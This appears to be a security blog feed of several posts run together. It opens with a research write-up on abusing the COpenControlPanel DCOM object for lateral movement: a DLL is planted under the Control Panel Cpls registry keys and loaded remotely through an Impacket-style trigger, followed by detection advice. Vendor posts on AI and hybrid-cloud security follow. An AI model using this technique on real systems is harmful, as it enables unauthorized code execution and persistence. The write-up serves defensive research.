The COM Surrogate process was designed to host COM server DLLs in a separate process rather than loading them directly into the client process's address space. This isolation improves stability for the in-process server model. By default, an in-process server DLL is loaded into the client process itself; if you want it to run in a separate process instead, this hosting behavior can be configured for the COM object in the registry.
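For completeness, this is what the documented surrogate configuration looks like in the registry: an AppID value on the CLSID key, plus an empty DllSurrogate value under the matching AppID key (the empty string selects the default surrogate, dllhost.exe). The all-zero GUID below is a placeholder, not a real class:

```
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000000}]
"AppID"="{00000000-0000-0000-0000-000000000000}"

[HKEY_CLASSES_ROOT\AppID\{00000000-0000-0000-0000-000000000000}]
"DllSurrogate"=""
```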

โ€˜DCOMingโ€™ through Control Panel items

While following the manual approach of enumerating COM/DCOM objects that could be useful for lateral movement, I came across a COM object called COpenControlPanel, which is exposed through shell32.dll and has the CLSID {06622D85-6856-4460-8DE1-A81921B41C4B}. This object exposes multiple interfaces, one of which is IOpenControlPanel with IID {D11AD862-66DE-4DF4-BF6C-1F5621996AF1}.

IOpenControlPanel interface in the OleViewDotNet output

I immediately thought of its potential to compromise Control Panel items, so I wanted to check which functions were exposed by this interface. Unfortunately, neither the interface nor the COM class has a type library.

COpenControlPanel interfaces without TypeLib

Normally, checking the interface definition would require reverse engineering, so at first, it looked like we needed to take a different research path. However, it turned out that the IOpenControlPanel interface is documented on MSDN, and according to the documentation, it exposes several functions. One of them, called Open, allows a specified Control Panel item to be opened using its name as the first argument.

Full type and function definitions are provided in the shobjidl_core.h Windows header file.

Open function exposed by IOpenControlPanel interface

Itโ€™s worth noting that in newer versions of Windows (e.g., Windows Server 2025 and Windows 11), Microsoft has removed interface names from the registry, which means they can no longer be identified through OleViewDotNet.

COpenControlPanel interfaces without names

Returning to the COpenControlPanel COM object, I found that the Open function can trigger a DLL to be loaded into memory if it has been registered in the registry. For the purposes of this research, I created a DLL that simply spawns a message box from its DllEntryPoint function. I registered it under HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls and then created a simple C++ COM client to call the Open function on this interface.

As expected, the DLL was loaded into memory. It was hosted in the same way that it would be if the Control Panel itself was opened: through the COM Surrogate process (dllhost.exe). Using Process Explorer, it was clear that dllhost.exe loaded my DLL while simultaneously hosting the COpenControlPanel object along with other COM objects.

COM Surrogate loading a custom DLL and hosting the COpenControlPanel object

Based on my testing, I made the following observations:

  1. The DLL that needs to be registered does not necessarily have to be a .cpl file; any DLL with a valid entry point will be loaded.
  2. The Open() function accepts the name of a Control Panel item as its first argument. However, it appears that even if a random string is supplied, it still causes all DLLs registered in the relevant registry location to be loaded into memory.

Now, what if we could trigger this COM object remotely? In other words, what if it is not just a COM object but also a DCOM object? To verify this, we checked the AppID of the COpenControlPanel object using OleViewDotNet.

COpenControlPanel object in OleViewDotNet

Both the launch and access permissions are empty, which means the object will follow the systemโ€™s default DCOM security policy. By default, members of the Administrators group are allowed to launch and access the DCOM object.

Based on this, we can build a remote strategy. First, upload the โ€œmaliciousโ€ DLL, then use the Remote Registry service to register it in the appropriate registry location. Finally, use a trigger acting as a DCOM client to remotely invoke the Open() function, causing our DLL to be loaded. The diagram below illustrates the flow of this approach.

Malicious DLL loading using DCOM

The trigger can be written in either C++ or Python, for example, using Impacket. I chose Python because of its flexibility. The trigger itself is straightforward: we define the DCOM class, the interface, and the function to call. The full code example can be found here.
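The linked code is the authoritative trigger; the fragment below only pins down the two GUIDs from this research and outlines, in comments, how an Impacket-based client would activate the object. DCOMConnection and CoCreateInstanceEx are real Impacket APIs, but the surrounding flow here is an illustrative assumption, not the published trigger:

```python
import uuid

# GUIDs from this research: the COpenControlPanel class and the
# IOpenControlPanel interface it exposes.
CLSID_COpenControlPanel = "06622D85-6856-4460-8DE1-A81921B41C4B"
IID_IOpenControlPanel   = "D11AD862-66DE-4DF4-BF6C-1F5621996AF1"

def as_registry_format(guid: str) -> str:
    """Normalize a GUID string to the braced, upper-case registry form."""
    return "{%s}" % str(uuid.UUID(guid)).upper()

# Outline of the remote trigger (requires Impacket on the attacking host):
#
#   from impacket.dcerpc.v5.dcomrt import DCOMConnection
#   dcom = DCOMConnection(target, username, password, domain)
#   iface = dcom.CoCreateInstanceEx(clsid_bin, iid_bin)
#   ... marshal the call to Open() over the returned interface ...
#
# CoCreateInstanceEx expects binary GUIDs (impacket.uuid.string_to_bin),
# and building the Open() request additionally requires defining the
# interface's call layout, which the full code example covers.
```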

Once the trigger runs, the behavior will be the same as when executing the COM client locally: our DLL will be loaded through the COM Surrogate process (dllhost.exe).

As you can see, this technique not only achieves command execution but also provides persistence. It can be triggered in two ways: when a user opens the Control Panel or remotely at any time via DCOM.

Detection

The first step in detecting such activity is to check whether any Control Panel items have been registered under the following registry paths:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

Although well-known best practices and Windows security research papers advise monitoring only the first subkey, thorough coverage requires monitoring all three.
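The registry sweep over those three paths can be sketched as follows. The `read_values` callable abstracts the registry so the logic can be tested offline; on Windows you would implement it with winreg (OpenKey and EnumValue) over each path. The helper and its name are mine, not part of any product:

```python
# The three locations where Control Panel DLLs can be registered.
CPLS_PATHS = [
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls",
    r"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls",
]

def find_registered_cpls(read_values) -> list:
    """Return (path, value_name, dll_path) triples for every registered
    Control Panel item. Any hit here is worth reviewing."""
    findings = []
    for path in CPLS_PATHS:
        for name, dll in read_values(path).items():
            findings.append((path, name, dll))
    return findings
```

Feeding it a stub that reports one value under the WOW6432Node key returns a single finding, which in a real deployment would be forwarded for analyst review.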

In addition, monitoring dllhost.exe (COM Surrogate) for unusual COM objects such as COpenControlPanel can provide indicators of malicious activity.

Finally, it is always recommended to monitor Remote Registry usage because it is commonly abused in many types of attacks, not just in this scenario.

Conclusion

In conclusion, I hope this research has clarified yet another attack vector and emphasized the importance of implementing hardening practices. Below are a few closing points for security researchers to take into account:

  • As shown, DCOM represents a large attack surface. Windows exposes many DCOM classes, a significant number of which lack type libraries โ€“ meaning reverse engineering can reveal additional classes that may be abused for lateral movement.
  • Changing registry values to register malicious CPLs is not good practice from a red teaming ethics perspective. Defender products tend to monitor common persistence paths, but Control Panel applets can be registered in multiple registry locations, so there is always a gap that can be exploited.
  • Bitness also matters. On x64 systems, loading a 32-bit DLL will spawn a 32-bit COM Surrogate process (dllhost.exe *32). This is unusual on 64-bit hosts and therefore serves as a useful detection signal for defenders and an interesting red flag for red teamers to consider.

From the Hill: The AI-Cybersecurity Imperative in Financial Services

18 December 2025 at 15:00

The transformative potential of artificial intelligence (AI) across industries is undeniable. But realizing AI's true value hinges on three cybersecurity imperatives: Understanding the AI-cybersecurity nexus, harnessing AI to supercharge cyber defense, and embedding security into AI tools from the ground up through Secure AI by Design.

Nowhere is this convergence more urgent than in financial services. Sitting at the center of our global economy, financial institutions face a dual mandate: Embrace AI for cybersecurity and cybersecurity for AI.

I was honored to cover these key principles in my testimony before the House Committee on Financial Services, led by Chairman French Hill. The hearing, entitled "From Principles to Policy: Enabling 21st Century AI Innovation in Financial Services," convened witnesses from Palo Alto Networks, Google, NASDAQ, Zillow and Public Citizen. Together, we examined AI use cases in the financial services and housing sectors, including those specific to cybersecurity, and assessed how existing laws and frameworks apply in the age of AI.

The Defense Advantage Is AI-Powered Security Operations

Attacks have accelerated: the time from compromise to data exfiltration is now 100 times shorter than it was four years ago. The financial sector bears disproportionate risk, given the value of its data and interconnected systems, while firms contend with evolving regulatory expectations, talent shortages and the persistent tendency to elevate cybersecurity only after an incident.

Generative and agentic AI intensify these pressures by accelerating every phase of the attack chain, from deepfake-driven fraud to tailored spear phishing campaigns. Our researchers at Unit 42ยฎ have found that agentic AI, autonomous systems that can reason and act without human intervention, can compress what was once a multiday ransomware campaign into roughly 25 minutes.

To keep pace, financial institutions must pivot to AI-driven defenses that operate at machine speed.

Security operations centers (SOCs) have long been overwhelmed by traditional alerts and fragmented data. Security teams, forced into manual triage across dozens of disparate tools, face an inefficient model that leaves vulnerabilities exposed, burns out analysts and makes it impossible to operate at the speed necessary to outpace modern attacks.

The average enterprise SOC ingests data from 83 security solutions across 29 vendors. In 75% of breaches, logging existed that should have flagged anomalous behavior, but critical signals were buried. With 90% of SOCs still relying on manual processes, adversaries have the clear advantage.

AI-driven SOCs flip this paradigm, acting as a force multiplier to substantially reduce detection and response times. To illustrate the scale of this necessity, consider our own security operations. Palo Alto Networks SOC analyzes over 90 billion events daily. Without AI, this would be an impossible task for human analysts. But by applying AI, we distill that down to a single actionable incident.

Financial institutions migrating to AI-driven SOC platforms are seeing transformative results:

  • One customer reduced the Mean Time to Respond (MTTR) from one day to 14 minutes.
  • Another prevented 22,831 threats and processed 113,271 threat indicators in less than 5 seconds.
  • A large bank saved 180 hours per year by automating security information and event management reporting; 500 hours through automated data collection; 360 hours by automating four Chief Technology Officer playbooks; and 240 hours with automated threat intelligence enrichment.

These improvements are critical to stopping threat actors. But none of this would be possible without AI.

Securing the New AI Attack Surface

As AI adoption grows, it will further expand the attack surface, creating new vectors targeting training data and model environments. AI's rapid growth is outpacing the adoption of security measures designed to protect it. Nearly three-quarters of S&P 500 companies now flag AI as a material risk in their public disclosures, up from just 12% in 2023.

Traditional security tools rely on static rules that miss advanced attacks, like multistep prompt injections or adversarial manipulations. Autonomous AI agents can take unpredictable actions that are difficult to monitor with legacy methods.

Rapid AI adoption has exposed organizations' infrastructure, data, models, applications and agents to unique threats. Unlike traditional cyber exploits that target software vulnerabilities, AI-specific attacks can manipulate the foundation of how an AI system learns and operates.

A Secure AI by Design

Even with an understanding of the risks, many organizations struggle with the lack of clarity on what effective AI security looks like in practice. Recognizing the gap between intent and execution, Palo Alto Networks developed Secure AI by Design, a policy roadmap that integrates security throughout the entire AI lifecycle.

A proactive stance ensures security is built in as a feature rather than an afterthought, which is crucial for building trust, maintaining compliance and mitigating risk. The approach addresses the four imperatives organizations most pressingly face in AI adoption:

1. Secure the use of external AI tools.

2. Secure the underlying AI infrastructure and data.

3. Safely build and deploy AI applications.

4. Monitor and control AI agents.

The Path Forward

For financial institutions, Secure AI by Design must be anchored in enterprise governance. Institutions should maintain risk-tiered AI inventories, enforce strict access controls and implement testing commensurate with risk. Governance structures should enable board oversight and align with established model risk practices.

Policymakers also have a critical role to play in promoting AI-driven security operations, championing voluntary Secure AI by Design frameworks, ensuring policies safeguard innovation, enabling controlled experimentation and strengthening public-private collaboration.

Ultimately, the financial institutions that will thrive will recognize cybersecurity as the foundation that makes innovation possible. By embracing AI-driven defenses and securing AI systems from the ground up, the sector can confidently unlock AI's transformative potential while safeguarding the trust and stability that underpin the global economy.

Read the full testimony to learn more about how cybersecurity can enable AI innovation in financial services.

The post From the Hill: The AI-Cybersecurity Imperative in Financial Services appeared first on Palo Alto Networks Blog.

Check Point Infinity Global Services Launches First AI Security Training Courses

18 December 2025 at 13:00

Artificial Intelligence is transforming every industry, unlocking new opportunities while introducing new risks. That is why Infinity Global Services (IGS) is proud to announce the launch of our first dedicated AI security training courses. This is the first release in a growing IGS AI services portfolio, with upcoming offerings focused on AI red teaming, AI governance and AI implementation consulting services. The new courses are part of Infinity Global Services’ mission to empower organizations with the knowledge and tools to defend against emerging AI-driven threats and to implement AI securely in their operations and product development. Through hands-on training and expert-led […]

The post Check Point Infinity Global Services Launches First AI Security Training Courses appeared first on Check Point Blog.

Untangling Hybrid Cloud Security

From Fragmented Fences to Cohesive Control

The attack surface for todayโ€™s enterprises is incredibly heterogeneous and dynamic. Applications and data are in constant motion, spanning public clouds, private data centers and edge locations. Users connect from anywhere.

For security leaders, this environment has led to an explosion not only in operational complexity but, in many cases, in uncertainty. Together, Nutanix and Palo Alto Networks enable security to finally match the speed and scale of these dynamic hybrid cloud environments.

The security ecosystem has become vast and complex. Point solutions accumulate to address specific gaps, yet each adds another interface, another policy language and another integration to manage. However well intentioned, this sprawl can lead directly to fractured visibility, overlapping tools and operational fatigue.

Elevate Perimeter Protection to Defense-in-Depth

Enterprises today face unprecedented security complexity as hybrid and multicloud environments become the new normal. Currently, 94% of enterprises use some form of cloud service, while 89% report having a multicloud strategy in place. This distributed reality means security is paramount: while managing cloud spending is the number one operational challenge (82% overall), security remains a major concern, affecting 79% of all organizations.

Hybrid cloud adoption offers agility, but it also introduces distinct security challenges that strain traditional approaches. Adversaries have taken notice. Hybrid and multicloud environments are prime targets because they connect sensitive data, privileged accounts and critical systems across public cloud and on-premises infrastructure. Perimeter-based security models, built for static networks and centralized data centers, cannot keep pace in a world where apps and data continuously move between platforms.

Defense-in-depth has become essential for addressing the inherent dynamism of todayโ€™s environments. Network visibility is required to monitor and contain east-west traffic and lateral movement of threats inside cloud environments. Identity controls must verify every user, device and interaction across a distributed workforce. Data protection must follow sensitive information as it traverses multiple clouds, data centers and edge locations.

Yet managing these protections as distinct layers is no longer viable. Each cloud provider introduces its own native security controls. Each additional tool adds another interface and another policy set to maintain. Defense-in-depth only achieves its purpose when its layers are fully unified, providing consistent control enforcement from the edge to the core, comprehensive visibility across traffic, and essential data protections for all workloads, wherever they reside.

Freedom of Choice Without Fragmentation

Hybrid environments span public clouds, private infrastructure, SaaS ecosystems and legacy on-premises systems. No single vendor can realistically cover that entire landscape, and forcing security into a single closed ecosystem risks creating gaps where those environments meet.

The answer lies in an open ecosystem approach that allows organizations to assemble best-of-breed capabilities rather than being locked into a single providerโ€™s stack.

This flexibility empowers security teams to adapt to the unique requirements of each environment while still operating through a unified security model. Policies can be applied consistently, intelligence can be shared across layers, and protections can move in step with workloads, regardless of platform. In short, this model can effectively support freedom of choice while relieving the operational burden of managing hybrid and multicloud security.

A Unified Security Layer Across Every Environment

Open ecosystems solve the problem of choice. What remains is the challenge of bringing those best-of-breed capabilities together into a solution that is coherent and scalable.

To transform defense-in-depth from a conceptual framework into a practical system aligned to the realities of hybrid and multicloud deployments, this unified layer should be built on core capabilities:

  • Inline visibility for east-west traffic within virtualized and cloud environments, enabled by deploying next-generation firewalls directly inside virtual private clouds:
    This approach inspects workload-to-workload traffic, identifies anomalous behavior and stops lateral movement before it spreads.
  • Consistent policy enforcement across public cloud, private data centers and edge locations through a centralized management plane:
    A single set of policies should be authored once and pushed everywhere, assuring a consistent security posture across all clouds and environments.
  • Abstraction of security intent from network coordinates through tag-driven automation, an approach that allows security policies to be expressed in terms of workload attributes (rather than IPs or locations):
    These protections follow workloads automatically as they move. Through integration with orchestration pipelines, this approach aligns controls with rapid application rollouts in CI/CD workflows, all without manual reconfiguration.

With these core capabilities, security can finally catch up to the fluidity promised by hybrid cloud operating models.
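As a rough illustration of the tag-driven abstraction described above (a generic sketch, not Palo Alto Networks' or Nutanix's actual policy syntax), a rule can match workload tags instead of IP addresses, so protections follow a workload even when it migrates and its network coordinates change:

```python
from dataclasses import dataclass, field

@dataclass
class Workload:
    name: str
    ip: str                      # changes as the workload moves
    tags: set = field(default_factory=set)

@dataclass
class Rule:
    src_tag: str
    dst_tag: str
    action: str                  # "allow" or "deny"

def evaluate(rules, src: Workload, dst: Workload) -> str:
    """First rule whose tags match both endpoints wins; default-deny."""
    for r in rules:
        if r.src_tag in src.tags and r.dst_tag in dst.tags:
            return r.action
    return "deny"

# Policy is expressed in workload attributes, not IPs or locations.
rules = [Rule("role:web", "role:db", "allow")]

web = Workload("web-01", "10.0.1.5", {"role:web"})
db = Workload("db-01", "10.0.2.9", {"role:db"})
assert evaluate(rules, web, db) == "allow"

# The database migrates to another cloud and receives a new IP...
db.ip = "172.16.8.4"
# ...but the tag-based policy still applies without reconfiguration.
assert evaluate(rules, web, db) == "allow"

# An untagged workload falls through to the default-deny.
rogue = Workload("vm-x", "10.0.3.7", set())
assert evaluate(rules, web, rogue) == "deny"
```

In an orchestration pipeline, the same idea lets CI/CD tooling tag workloads at deploy time so that the matching security controls attach automatically, with no manual rule edits per rollout.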

Explore how Palo Alto Networks and Nutanix work together to make this unified vision a reality, including joint offerings like Nutanix clusters secured with Palo Alto Networks VM-Series Firewalls for AWS® and Microsoft® Azure.

The post Untangling Hybrid Cloud Security appeared first on Palo Alto Networks Blog.

โŒ